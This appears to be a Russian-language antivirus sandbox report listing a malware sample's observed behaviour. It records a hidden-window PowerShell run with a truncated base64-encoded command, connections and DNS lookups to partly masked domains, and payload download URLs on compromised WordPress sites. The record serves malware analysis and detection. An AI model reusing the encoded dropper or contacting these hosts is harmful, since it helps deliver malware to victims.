Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAFAASABNAEMAYgBhAHoAPQAnAE4ATQBBAEMASQB1AHkAawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBgAFUAUgBpAHQAeQBQAGAAUgBPAFQAbwBgAEMAbwBMACIAIAA9AC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1976
- %TEMP%\1239131.cvr
- 'tr###tory.com':80
- 'sq###help.com':443
- 'ze####rotary.org':80
- 'ze####rotary.org':443
- 'cr###al.co.jp':80
- http://tr###tory.com/wp-admin/zvxarrh54123/
- http://tr###tory.com/
- http://ze####rotary.org/wp-admin/omlbGyZY/
- http://cr###al.co.jp/wp-content/T54s8h033/
- 'sq###help.com':443
- 'ze####rotary.org':443
- DNS ASK tr###tory.com
- DNS ASK sq###help.com
- DNS ASK ca####hlight.com
- DNS ASK ze####rotary.org
- DNS ASK cr###al.co.jp
- DNS ASK go#####sgraciously.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAFAASABNAEMAYgBhAHoAPQAnAE4ATQBBAEMASQB1AHkAawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBgAFUAUgBpAHQAeQBQAGAAUgBPAFQAbwBgAEMAbwBMACIAIAA9AC...' (со скрытым окном)